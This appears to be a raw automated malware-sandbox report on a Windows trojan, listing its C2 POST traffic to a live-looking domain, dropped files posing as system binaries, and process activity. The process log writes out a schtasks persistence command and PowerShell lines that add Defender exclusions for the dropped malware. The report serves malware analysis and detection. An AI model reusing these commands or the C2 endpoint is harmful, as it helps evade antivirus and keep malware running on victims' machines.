                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: 188387cm.n9shteam.in
                    Source: unknownHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:55:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCc4l8Mq4w8yasVGHIME8n3WQZ7Y%2BpBziQAakd4hvT8IZbrbE7zCVCgELsRBw3AAIL3xd3viH%2ByE0LTtPUaaz2ATjTKC5%2FGP4OWDbHdyNsBXkk3ojBR7vMEcb3yvNscdnbRSkMCajw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1b0dcd07c44f-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3191&min_rtt=1579&rtt_var=3817&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=633&delivery_rate=100821&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:56:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tUvEIZRzSEEz4FbcwiFrqgWL7YPd7YZKCaPku%2FJJJCnhIWRVvC88pkScHX0QqHcwZ2%2FNP5eKgf7O%2B00SuaOGM93bk7ZrnVGM017pY9335jBgUanXY6EGH2wY2mMU0BBAUWcExi9kuQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1ca90ab678d6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3531&min_rtt=1806&rtt_var=4128&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=686&delivery_rate=93535&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:56:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BDfsCJLI4TlbxCD4EPrlBkRXEANjCs7cA5SWCBCgTd%2F8SvhKrR4Cvs3X9HYFgPw8COGTjp0GfUQFYBLmnw7Ryha9AweJ1%2BJAjYrj9YvEk%2Bh56Mm8%2Fzyp22VADf6IXr8HVZPtmg5dQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1cdb6eaf42ef-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=15154&min_rtt=10362&rtt_var=13470&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=29978&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:56:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XoriqbBOB%2BCnBJAgk1lEQ7zc2ueqGZthy0NIwZQh0Zv8mB0cHrZs%2FG7xwvZdK0CTWOsYpC%2B1WX%2FIOoNWFCDauGa4Om02vXkwCcpriwBN%2BPKJWeVHP2cfwKwBTBRkcXjuzOBECwh3zg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1d0ecd044356-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3115&min_rtt=1607&rtt_var=3620&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=680&delivery_rate=106740&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:56:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gGiJxCFXy2nr0giY%2BiuZ7mHxecmuJMOKctQc9gJobJeuBRy%2BSjzBzztVtrdHA8Nw5JiSvAjcES7x3M1K173x9d%2FGRCfDFGyEurdTSxx4%2FT1OPAInsGHaIlrTTwy2PmM5ZJoY%2FtjYSA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1d422992c44f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3199&min_rtt=1734&rtt_var=3580&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=108501&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:57:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=auUHd77mNbIY1OFSqt2cPCeGF9%2BKIbFEsglIl2cnYKJ4pcvgaQtrCXw7UfVwo72QVPUkrsSEYBLD%2F%2FrwwEI6y4wALY0DPpOCZPmKpj3Qf6YPj7vQPXqtvglfPNYD23vZW883nk%2B0ow%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1da30b1178d6-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3533&min_rtt=1781&rtt_var=4172&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=645&delivery_rate=92422&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:57:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vKnm5Aktim%2BkOGzhYTEDjQd417a%2FSLQ715r3CKgzplPfpzJUbXOV9sKuOpc%2F0z0DP8RM2uBgZzpePKm%2BpAmezsjTAsWnSEkw5ewZ5dTFkWpdS63IHoIN0lzzCQBZmYoopq2k4GtBnA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1dd7ac5942ef-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4035&min_rtt=1586&rtt_var=5494&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=68919&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:57:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AagREarZeZlWCORPNbVh%2FdF17qqYnei67zS%2FF4igQ5vA%2FqoDn7PPZlhwi6RgY3%2FIKSE1OCvVxltPQI5aEFDXFqhnV0uMbXwboVuHtFd1%2FMgSWtcKBtWkLLlOoXzS1yW0s1LeJHZ3nA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1e08fc194356-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3514&min_rtt=1702&rtt_var=4263&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=90112&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:57:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=znrVN6YZReAP%2Fw3qnpZB1toKNEgQDb0oUF0soQre702DRXxtokfpRrq94DMxyXnseRSM4Ze7EY7FLUg%2BHwPHCyO1X%2BqK6b9hVq1aM2H8aq27OMDeRPbT%2FP8%2FP9M2eUB9pHU5BCRplA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff1e3b4aef0f41-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3022&min_rtt=1630&rtt_var=3395&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=645&delivery_rate=114366&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                    Source: USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188387cm.n9shteam.in
                    Source: USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188387cm.n9shteam.in/
                    Source: USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                    Source: powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000001D.00000002.1978904137.000001421EE99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: JNKHlxGvw4.exe, 00000000.00000002.1832050899.0000000002A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1978904137.000001421EC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E300001000.00000004.00000800.00020000.00000000.sdmp, USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000001D.00000002.1978904137.000001421EE99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000001D.00000002.1978904137.000001421EC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9B851698
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9BC52D3C
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9BC47C40
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9BC51F8C
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9B891698
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9BC85741
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeCode function: 54_2_00007FFD9B861698
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B88E5B5
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B861698
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AsBtWtog.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                    Source: uhdUZoxx.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: vnccfbfp.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: RzSYqgUu.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: AsBtWtog.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: JNKHlxGvw4.exe, 00000000.00000000.1696681198.00000000001B4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs JNKHlxGvw4.exe
                    Source: JNKHlxGvw4.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs JNKHlxGvw4.exe
                    Source: JNKHlxGvw4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: JNKHlxGvw4.exeStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                    Source: lsass.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                    Source: USZqVcJFLA.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                    Source: RuntimeBroker.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                    Source: SystemSettings.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                    Source: uhdUZoxx.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: vnccfbfp.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: RzSYqgUu.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: AsBtWtog.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.JNKHlxGvw4.exe.1257bc70.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.JNKHlxGvw4.exe.12885b30.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@47/59@1/1
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\Desktop\uhdUZoxx.log
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
                    Source: C:\Recovery\USZqVcJFLA.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
                    Source: C:\Recovery\USZqVcJFLA.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-uarUuV05qHqkni1Ppe0P
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\AppData\Local\Temp\eaiouozr
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat"
                    Source: JNKHlxGvw4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: JNKHlxGvw4.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: JNKHlxGvw4.exeReversingLabs: Detection: 78%
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile read: C:\Users\user\Desktop\JNKHlxGvw4.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\JNKHlxGvw4.exe "C:\Users\user\Desktop\JNKHlxGvw4.exe"
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5227.tmp" "c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP"
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f
                    Source: unknownProcess created: C:\Users\user\Favorites\lsass.exe C:\Users\user\Favorites\lsass.exe
                    Source: unknownProcess created: C:\Users\user\Favorites\lsass.exe C:\Users\user\Favorites\lsass.exe
                    Source: unknownProcess created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                    Source: unknownProcess created: C:\Recovery\USZqVcJFLA.exe C:\Recovery\USZqVcJFLA.exe
Source: unknown | Process created: C:\Recovery\USZqVcJFLA.exe C:\Recovery\USZqVcJFLA.exe
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe'
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
